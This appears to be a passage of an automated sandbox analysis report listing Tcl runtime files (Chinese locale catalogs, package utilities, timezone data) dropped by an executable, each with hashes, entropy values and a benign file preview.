n\u0103m"\. "Th\u00e1ng s\

C:\Users\user\Desktop\tcl\msgs\zh.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3330
Entropy (8bit):	4.469203967086526
Encrypted:	false
SSDEEP:	48:468jDI/Tw71xDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyzag29dL:hn7wRdNL
MD5:	9C33FFDD4C13D2357AB595EC3BA70F04
SHA1:	A87F20F7A331DEFC33496ECDA50D855C8396E040
SHA-256:	EF81B41EC69F67A394ECE2B3983B67B3D0C8813624C2BFA1D8A8C15B21608AC9
SHA-512:	E31EEE90660236BCD958F3C540F56B2583290BAD6086AE78198A0819A92CF2394C62DE3800FDDD466A8068F4CABDFBCA46A648D419B1D0103381BF428D721B13
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh MONTHS_ABBREV [list \. "\u4e00\u6708"\. "\u4e8c\u6708"\. "\u4e09\u6708"\. "\u56db\u6708"\. "\u4e94\u6708"\. "\u516d\u6708"\. "\u4e03\u6708"\. "\u516b\u6708"\. "\u4e5d\u6708"\. "\u5341\u6708"\. "\u5341\u4e00\u6708"\. "\u5341\u4e8c\u6708"\. ""]. ::msgcat::mcset zh MONTHS_FULL [list \.

C:\Users\user\Desktop\tcl\msgs\zh_cn.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	312
Entropy (8bit):	5.1281364096481665
Encrypted:	false
SSDEEP:	6:SlSyEtJLlpuoo6dmoX5HoHJ+3vtfNrFLoHJ+3v6MY+oXa+3vYq9:4EnLzu8d5eJ+3vtNEJ+3v6L1L3vYq9
MD5:	EB94B41551EAAFFA5DF4F406C7ACA3A4
SHA1:	B0553108BDE43AA7ED362E2BFFAF1ABCA1567491
SHA-256:	85F91CF6E316774AA5D0C1ECA85C88E591FD537165BB79929C5E6A1CA99E56C8
SHA-512:	A0980A6F1AD9236647E4F18CC104999DB2C523153E8716FD0CFE57320E906DF80378A5C0CDE132F2C53F160F5304EAF34910D7D1BB5753987D74AFBC0B6F75F3
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e". ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S". ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2". ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z".}.

C:\Users\user\Desktop\tcl\msgs\zh_hk.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	752
Entropy (8bit):	4.660158381384211
Encrypted:	false
SSDEEP:	12:4EnLzu8qmDBHZLX+TyW4OU5yPgM9Lz+SC3WwLNMW3v6G3v3Ww+:4azu8qyFOw3WwLrvTv3Ww+
MD5:	D8C6BFBFCE44B6A8A038BA44CB3DB550
SHA1:	FBD609576E65B56EDA67FD8A1801A27B43DB5486
SHA-256:	D123E0B4C2614F680808B58CCA0C140BA187494B2C8BCF8C604C7EB739C70882
SHA-512:	3455145CF5C77FC847909AB1A283452D0C877158616C8AA7BDFFC141B86B2E66F9FF45C3BB6A4A9D758D2F8FFCB1FE919477C4553EFE527C0EDC912EBBCAABCD
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u4e00"\. "\u4e8c"\. "\u4e09"\. "\u56db"\. "\u4e94"\. "\u516d"]. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"\. ""]. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5". ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S". ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z".}.

C:\Users\user\Desktop\tcl\msgs\zh_sg.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.020358587042703
Encrypted:	false
SSDEEP:	6:SlSyEtJLlpuoo6dmoOpxoPpSocvNLohX3v6ZhLoh+3v6fJ:4EnLzu8WvNo3v6b3vu
MD5:	E0BC93B8F050D6D80B8173FF4FA4D7B7
SHA1:	231FF1B6F859D0261F15D2422DF09E756CE50CCB
SHA-256:	2683517766AF9DA0D87B7A862DE9ADEA82D9A1454FC773A9E3C1A6D92ABA947A
SHA-512:	8BA6EAC5F71167B83A58B47123ACF7939C348FE2A0CA2F092FE9F60C0CCFB901ADA0E8F2101C282C39BAE86C918390985731A8F66E481F8074732C37CD50727F
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_SG AM "\u4e0a\u5348". ::msgcat::mcset zh_SG PM "\u4e2d\u5348". ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y". ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z".}.

C:\Users\user\Desktop\tcl\msgs\zh_tw.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.08314435797197
Encrypted:	false
SSDEEP:	6:SlSyEtJLlpuoo6dmoAykaRULH/XRxvBoAyjZRULH5oAyU/G0OZoAyxW3v6ZhLoAR:4EnLzu8I5xEOKRWW3v6w3v8AC
MD5:	9CD17E7F28186E0E71932CC241D1CBB1
SHA1:	AF1EE536AABB8198BA88D3474ED49F76A37E89FF
SHA-256:	D582406C51A3DB1EADF6507C50A1F85740FDA7DA8E27FC1438FEB6242900CB12
SHA-512:	4712DD6A27A09EA339615FC3D17BC8E4CD64FF12B2B8012E01FD4D3E7789263899FA05EDDB77044DC7B7D32B3DC55A52B8320D93499DF9A6799A8E4D07174525
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d". ::msgcat::mcset zh_TW CE "\u6c11\u570b". ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e". ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z".}.

C:\Users\user\Desktop\tcl\opt0.4\optparse.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32944
Entropy (8bit):	4.566500533811999
Encrypted:	false
SSDEEP:	768:UcgIWNogzfwKFJ7glWLhTBh3agIQpojk8Cmy8A2Q:mIG1jM8hqgIfQlmy8/Q
MD5:	4BF0D2DB3BEFD60D03845D413FA09184
SHA1:	22389776C25FB3260EE205ADCC084764CFF2D246
SHA-256:	217074E45FC877CEDDB0EB10FCA94FCF43DC235DD8DC4BD1C9B6EC3121AE726C
SHA-512:	EB8E1619B868B18084F99733294B727C5B485AFC020A70EE0530D1AB6646C5265F88B8970314566353812E5E87111BFF2E328832C3755679F8884CB1603E18A1
Malicious:	false
Preview:	# optparse.tcl --.#.# (private) Option parsing package.# Primarily used internally by the safe:: code..#.#.WARNING: This code will go away in a future release.#.of Tcl. It is NOT supported and you should not rely.#.on it. If your code does rely on this package you.#.may directly incorporate this code into your application...package require Tcl 8.2.# When this version number changes, update the pkgIndex.tcl file.# and the install directory in the Makefiles..package provide opt 0.4.5..namespace eval ::tcl {.. # Exported APIs. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \. OptProc OptProcArgGiven OptParse \.. Lempty Lget \. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \. SetMax SetMin...################# Example of use / 'user documentation' ###################.. proc OptCreateTestProc {} {...# Defines ::tcl::OptParseTest as a test proc with parsed arguments..# (can't be defined before the code below is

C:\Users\user\Desktop\tcl\opt0.4\pkgIndex.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	607
Entropy (8bit):	4.652658850873767
Encrypted:	false
SSDEEP:	12:jHxJRuMopS42wyGlTajUA43KXks4L1GbyvXJQ+pBbX:bvRmS42wyGlTah9XkbL7XJBB
MD5:	F46D9D88D3CC6634963091B3BDC07610
SHA1:	67D9FEFB7A5881A84E8021F948747826550C8DAC
SHA-256:	A088E549D18ADE683273E31C004DAA7E614642FE801AFB3861EB85445250186B
SHA-512:	BD216B84C029CB851A7C6476CB14F3508D963AB9680546F50BB3C542B713164EC0BBC2FB85F63613245184D09935964D9025E35802D2EF1600053A7F7F0A031C
Malicious:	false
Preview:	# Tcl package index file, version 1.1.# This file is generated by the "pkg_mkIndex -direct" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...if {![package vsatisfies [package provide Tcl] 8.2]} {return}.package ifneeded opt 0.4.5 [list source [file join $dir optparse.tcl]].

C:\Users\user\Desktop\tcl\package.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23398
Entropy (8bit):	4.838387587213033
Encrypted:	false
SSDEEP:	384:L2QmduMPBKCaSzv6yMiowleI3YfwTJBcDVL/xuIBCDVL3jva4Y9:L2QmMaBqqv6bFw/ofKJB+FpNBAF3jTY9
MD5:	E8F866596A08D1E7A455C8C98C300160
SHA1:	4EA838548D7331355211188FC061DCCE36412BD3
SHA-256:	7D2DF9C7DE4F6D20EFFE26701E4B37F0495B65EF4DF392C53942E42FDDD6224C
SHA-512:	15F59189D4928B24873EC1A9F99E063AA307CEEF79395A6D742F88804327643A7E4C1CDCCF7117666E5060C54AFB94B5924D0472849B78CD4553133A47200CF8
Malicious:	false
Preview:	# package.tcl --.#.# utility procs formerly in init.tcl which can be loaded on demand.# for package management..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval tcl::Pkg {}..# ::tcl::Pkg::CompareExtension --.#.# Used internally by pkg_mkIndex to compare the extension of a file to.# a given extension. On Windows, it uses a case-insensitive comparison.# because the file system can be file insensitive..#.# Arguments:.# fileName.name of a file whose extension is compared.# ext..(optional) The extension to compare against; you must.#..provide the starting dot..#..Defaults to [info sharedlibextension].#.# Results:.# Returns 1 if the extension matches, 0 otherwise..proc tcl::Pkg::CompareExtension { fileName {ext {}} } {. global tcl_platform. if {$ext eq ""} {se

C:\Users\user\Desktop\tcl\parray.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	803
Entropy (8bit):	4.832763542213876
Encrypted:	false
SSDEEP:	12:TcS2n1RBbgZKaNHaeYFSxYmXqt9306UafZwXgEImK7k35IpbdELS8/McjbPgnE:TcHn5sZKGkwa/1xfJmRGNc93j7CE
MD5:	727E547C9C9A8A2B0937FB1C20E8AA26
SHA1:	46A08300C8D8176D7458394CFC14C22057513EEC
SHA-256:	CCDEE375379162A69C43ECF76068150475108C01DD5886915C8355B5FA78E006
SHA-512:	4E0CEFE7F484CFFAD5C89CBE0288D0BD83875BCD7388C135177C496DD5143CEF5C7B576944B82CD305832E1AC813AB81623FDC02FAF9527F31C5DEF655FD3FC5
Malicious:	false
Preview:	# parray:.# Print the contents of a global array on stdout..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..proc parray {a {pattern }} {. upvar 1 $a array. if {![array exists array]} {..error "\"$a\" isn't an array". }. set maxl 0. set names [lsort [array names array $pattern]]. foreach name $names {..if {[string length $name] > $maxl} {.. set maxl [string length $name]..}. }. set maxl [expr {$maxl + [string length $a] + 2}]. foreach name $names {..set nameString [format %s(%s) $a $name]..puts stdout [format "%-s = %s" $maxl $nameString $array($name)]. }.}.

C:\Users\user\Desktop\tcl\safe.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	33170
Entropy (8bit):	4.750851780095501
Encrypted:	false
SSDEEP:	768:Ok/FcXhzYqZz/zL2JjYO77lvnthi10QEnoIHd2/8FGQjmRCzY3ZKIYkA:Ok/Fc6qZD2JjYO7FrC0VnoIHoUFG7Czz
MD5:	0C1D0A505005B85E23C8C92B621DA261
SHA1:	0C2DA284980D382A97A7604B42E6A33FAE2464E2
SHA-256:	9B4B702E04EB2B256CC61B054F76D2D833D6064EF7821C38AA31C4DDA325F72A
SHA-512:	A574DCFC86690375AFB0684672EE10CA7C7CC7D9B9963F0E7DEAF0C2085DBABB0A00447769A61579D6F113ADA2ADA1802E006E232ED1C954B72BED13FAF8F222
Malicious:	false
Preview:	# safe.tcl --.#.# This file provide a safe loading/sourcing mechanism for safe interpreters..# It implements a virtual path mecanism to hide the real pathnames from the.# slave. It runs in a master interpreter and sets up data structure and.# aliases that will be invoked when used from a slave interpreter..# .# See the safe.n man page for details..#.# Copyright (c) 1996-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.# The implementation is based on namespaces. These naming conventions are.# followed:.# Private procs starts with uppercase..# Public procs are exported and starts with lowercase.#..# Needed utilities package.package require opt 0.4.1..# Create the safe namespace.namespace eval ::safe {. # Exported API:. namespace export interpCreate interpInit interpConfigure interpDelete \..interpAddToAccessPath interpFindInAccessPath setLogCmd.}..# Helper function t

C:\Users\user\Desktop\tcl\tclIndex Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6379
Entropy (8bit):	4.688241504356218
Encrypted:	false
SSDEEP:	192:edtEACkiwM3g4ePOiD15Q0AkU6PkrBkGUjZKspDzmK5SMFT3ssAilsMW03abjyRQ:edtEACkiwM3g4ePOiD15Q0AkU6PkrBkm
MD5:	1297B6CF6B7B195F3590C69CEA7207B9
SHA1:	1D25630A54DE056B7075BD04F3C934677032D5F6
SHA-256:	D652AC15F4A17285F9E48BAF62A02C3DF13FA40645A3BEBE1A00695FA3793632
SHA-512:	E351EBA1C68CFB2E3B894E4BA77C9482927EF354DEC785924529CC3AC5272630A944D09975B87055FDB76B2C4228A9CF2BE50FECC54975E61F06D9F28D3EB540
Malicious:	false
Preview:	# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(auto_reset) [list source [file join $dir auto.tcl]].set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.tcl]].set auto_index(::auto_mki

C:\Users\user\Desktop\tcl\tm.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11741
Entropy (8bit):	4.696598530425323
Encrypted:	false
SSDEEP:	192:oZ2gDZFpvXkM3SR1tco5h93ocy8G69hyjWDX5W6TV9TCBeZ4idLK3mQEuPPt4QV6:yxvXt3SR1r5bYcy8GahJJTV92idL4CuS
MD5:	E463FCD7371C7B7B2CCA32318495B9BF
SHA1:	5F15EBA1FA39EE4184C3C9CD7443AA7EFD7D20A8
SHA-256:	D970EBA69957A046F159F39D8CF214D15CD3C6F9D15430F2F948473D2E70311B
SHA-512:	DA113BAC8094EEB0DA353C183D87AA457910270CDB35A149BCE73B718EF1D60B3CE9D02B33C4C3540D9F0B22E2A3754ABEC3067E2EA34EA1392381E9741044A2
Malicious:	false
Preview:	# -- tcl --.#.# Searching for Tcl Modules. Defines a procedure, declares it as the.# primary command for finding packages, however also uses the former.# 'package unknown' command as a fallback..#.# Locates all possible packages in a directory via a less restricted.# glob. The targeted directory is derived from the name of the.# requested package. I.e. the TM scan will look only at directories.# which can contain the requested package. It will register all.# packages it found in the directory so that future requests have a.# higher chance of being fulfilled by the ifneeded database without.# having to come to us again..#.# We do not remember where we have been and simply rescan targeted.# directories when invoked again. The reasoning is this:.#.# - The only way we get back to the same directory is if someone is.# trying to [package require] something that wasn't there on the.# first scan..#.# Either.# 1) It is there now: If we rescan, you get it; if not you don't..#.# T

C:\Users\user\Desktop\tcl\tzdata\Africa\Abidjan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	141
Entropy (8bit):	4.951583909886815
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcsG/kXGm2OHnFvpsYvUdSalHFLd:SlSWB9X52DBGTm2OHnFvmYValHf
MD5:	6FB79707FD3A183F8A3C780CA2669D27
SHA1:	E703AB552B4231827ACD7872364C36C70988E4C0
SHA-256:	A5DC7BFB4F569361D438C8CF13A146CC2641A1A884ACF905BB51DA28FF29A900
SHA-512:	CDD3AD9AFFD246F4DFC40C1699E368FB2924E73928060B1178D298DCDB11DBD0E88BC10ED2FED265F7F7271AC5CCE14A60D65205084E9249154B8D54C2309E52
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Abidjan) {. {-9223372036854775808 -968 0 LMT}. {-1830383032 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Accra Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	520
Entropy (8bit):	4.306430974601464
Encrypted:	false
SSDEEP:	6:SlSWB9X52DU2Lm2OHp5aIXscJAQnU42SQYQ4KHOxDklwr:MBp52DUsmdHvjpU4C4Yugk
MD5:	B6820345F7C90DF00D388FAC2D7D8615
SHA1:	4CA4DB7C817C53AB6F4A4FF219FC6FFB1E64FB00
SHA-256:	C4C580E7EEB27B5BCA2E750A404B7190112C3985F0901845F4D079B86907B7CF
SHA-512:	BF67D2FD934D3F63E9862D628F4EEB807AA9DE421F67AEAA44DF493E5F020B6E76406FA6CCFB103FEF3E4BF2272DE84F99E6FBBBF182FA9E6AF1A785378FC2A1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Accra) {. {-9223372036854775808 -52 0 LMT}. {-1640995148 0 0 GMT}. {-1051920000 1200 1 GHST}. {-1041466800 0 0 GMT}. {-1020384000 1200 1 GHST}. {-1009930800 0 0 GMT}. {-988848000 1200 1 GHST}. {-978394800 0 0 GMT}. {-957312000 1200 1 GHST}. {-946858800 0 0 GMT}. {-925689600 1200 1 GHST}. {-915236400 0 0 GMT}. {-894153600 1200 1 GHST}. {-883700400 0 0 GMT}. {-862617600 1200 1 GHST}. {-852164400 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Addis_Ababa Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.888875108360427
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DczqIUXGm2OHq1FGxYvWUQKXdfFnXFw/sV42FFslv:SlSWB9X52Dnom2OHGkxY7QcpFwKu
MD5:	274A8CD7620D885D6A1783A046649F58
SHA1:	072F54CB87FFF2F08E3B6C1AD52F0951BEB2C84F
SHA-256:	5A8153DB35B8C3F9B305CB5DE0CC07F4599F118DD9EF8409609FC734348F072F
SHA-512:	26F4B9CB8D0A1E3EE918D43A6EB8870E2EC3C4111B997961ED66F1BB53652483BF5317AF1C5B70CB2BA4B9981B2350184E79570C3F58F7A7ED76AB4C0011DEBD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Addis_Ababa) {. {-9223372036854775808 9288 0 LMT}. {-3155682888 9320 0 ADMT}. {-1062210920 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Algiers Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	4.110061823095588
Encrypted:	false
SSDEEP:	12:MBp52D7AmdHh5PMybVSqSFvvqXFaLSaSxmvWo/fmvCkQ6eW6Xs8QQB1r5Q:cQIefMyb8BF6XFaLSxktf1PW6X4q1K
MD5:	8221A83520B1D3DE02E886CFB1948DE3
SHA1:	0806A0898FDE6F5AE502C64515A1345D71B1F7D2
SHA-256:	5EE3B25676E813D89ED866D03B5C3388567D8307A2A60D1C4A34D938CBADF710
SHA-512:	2B8A837F7CF6DE43DF4072BF4A54226235DA8B8CA78EF55649C7BF133B2E002C614FE7C693004E3B17C25FBCECAAD5CD9B0A8CB0A5D32ADF68EA019203EE8704
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Algiers) {. {-9223372036854775808 732 0 LMT}. {-2486679072 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1531443600 0 0 WET}. {-956365200 3600 1 WEST}. {-950486400 0 0 WET}. {-942012000 3600 0 CET}. {-812502000 7200 1 CEST}. {-796262400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766630800 3600 0 CET}. {-733280400 0 0 WET}. {-439430400 3600 0 CET}. {-212029200 0 0 WET}. {41468400 3600 1 WEST}. {54774000 0 0 WET}. {231724800 3600 1 WEST}. {246240000 3600 0 CET}. {259545600 7200 1 CEST}. {275274000 3600 0 CET}. {309740400 0 0 WET}. {325468800 3600 1 WEST}. {3418020

C:\Users\user\Desktop\tcl\tzdata\Africa\Asmara Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	203
Entropy (8bit):	4.778693788222811
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcjEUEwcXGm2OHAkevWUQKXcTFV3xGZTWVVw/sV42FFslv:SlSWB9X52DGbm2OHJe7QDvGZabwKu
MD5:	FB0618C4C2F3C0EED77674D71F3E5A6D
SHA1:	F29C8DD4AEDE55AB8B5EFB61184A504AE599D965
SHA-256:	E9C1710744E66DC559A9D4AB0BCD180C813411D2BE6458A6E99183B2734BB4D2
SHA-512:	6B22D8AE43DE881D8C30B1AF4EE33B3E8C1ADF0E2BF7B0B69C5B047A4E3211B6F1C788CB5A17E6DC1331FD0180E2AC519C0CAE19F849CCED888AEF0CCA07732B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Asmara) {. {-9223372036854775808 9332 0 LMT}. {-3155682932 9332 0 AMT}. {-2524530932 9320 0 ADMT}. {-1062210920 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Asmera Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.718682713064743
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqsjEUGkdVAIgNGEXEUKN2DcjAWDcjEUu:SlSWB9IZaM3y7PtdVAIgNTrKN2D8DGu
MD5:	694B2849DFA4017184061711CB651DC5
SHA1:	A393458E21DD49669D6B6AB7A8B45D4BF697423A
SHA-256:	DC469FBF3D658DCACAA1738F9CB8A3820A01EE494D8637896F6781D58C29C8C1
SHA-512:	04B96F7AC8C51AA46CAFFA8D5311FAB29EECF3635C688DB97E128B961AEFD7C301221B1A904936AB402F95144CB48A00BC83B2BC2D2B6D9A8996BF2B53B387E5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Asmara)]} {. LoadTimeZoneFile Africa/Asmara.}.set TZData(:Africa/Asmera) $TZData(:Africa/Asmara).

C:\Users\user\Desktop\tcl\tzdata\Africa\Bamako Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	196
Entropy (8bit):	4.7766834167426335
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcxfEXGm2OHE55vUdSaVF7lUT3VQWTvYvFYVUFNFd:SlSWB9X52DwfLm2OHkVaVAVvGdv
MD5:	982DDE520A2E65AC97F23042AA13FB7C
SHA1:	4D0138E2564A10F087FF857322197A4077829602
SHA-256:	2BFDB9FC1025D1EF6E3F59B885C8ECB7C122B3C6C4655EB21793B45B56F58081
SHA-512:	104FEB900BF899EE6D314B54E21B4EF3189B1EE22ACC24F4559EA814DD08172C7E2D15F97DDD933C2A1A16324B8FCD839A9C64D1CA8C04B4FFCDEEA4E048E02D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bamako) {. {-9223372036854775808 -1920 0 LMT}. {-1830382080 0 0 GMT}. {-1131235200 -3600 0 WAT}. {-300841200 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Bangui Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.981520266784117
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dcx2RFSXGm2OH3TvVkevUdSaMVFZYvCn:SlSWB9X52DwQFJm2OHSeVaUXLn
MD5:	FF53442AE314119AF626304FC5DF420D
SHA1:	D10D1F9DF9066D875D3AA94255AD6412D38D75A2
SHA-256:	3B859C6433B64C07F2FFDB7A6F3BF93D82C98DB1F19BFD5940822EECEDFEDE61
SHA-512:	D9EADB65FF36C51E801BC0EF2CCD4CEBC72CE3CC435B008BC234D762A811F79D95C3A4AAF8907F39F407D65A7CDC2CA0F3F89710FD854557CEBE38F9DF08DEE8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bangui) {. {-9223372036854775808 4460 0 LMT}. {-1830388460 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Banjul Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	200
Entropy (8bit):	4.845033614915018
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dcx79Fw/kXGm2OHF8evUdSaJIWtnvFFsUuv9YvFadndSvvFd:SlSWB9X52Dw7wTm2OHmeVaG4nVu1GfX
MD5:	A8DC20436F4AC11014A23FE0E479DEF0
SHA1:	061D1050C42479E24B3FAED9E97AADD2893C3BD2
SHA-256:	0C250EDB19EBAE2F3EBDACA31B63CD36FE36737846D57F597AB0356D9FA85244
SHA-512:	CB28F9EF90EF157FC63A6A559990A004CA6A34CB1B97B042F5E177FBB8C05A48B89FF5B1E2706CEE4A019B2958AD9C758FBD943ED84DE2E36F365F0896510870
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Banjul) {. {-9223372036854775808 -3996 0 LMT}. {-1830380004 -3996 0 BMT}. {-1104533604 -3600 0 WAT}. {-189385200 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Bissau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.888566941274038
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dc5ixXGm2OHGVkevUd9dV7HvYvF6hSVPVFd:SlSWB9X52D4fm2OHCkeo/DvGMmh
MD5:	9583C83A1209F545BEA5056704237C88
SHA1:	F9B5551C90BD9B9C36A726D16EA99DF7BAF00BFF
SHA-256:	D48EEB7EAED469B7E88B1BFF478099C932951B8648C939BD1F7D585BD12366D8
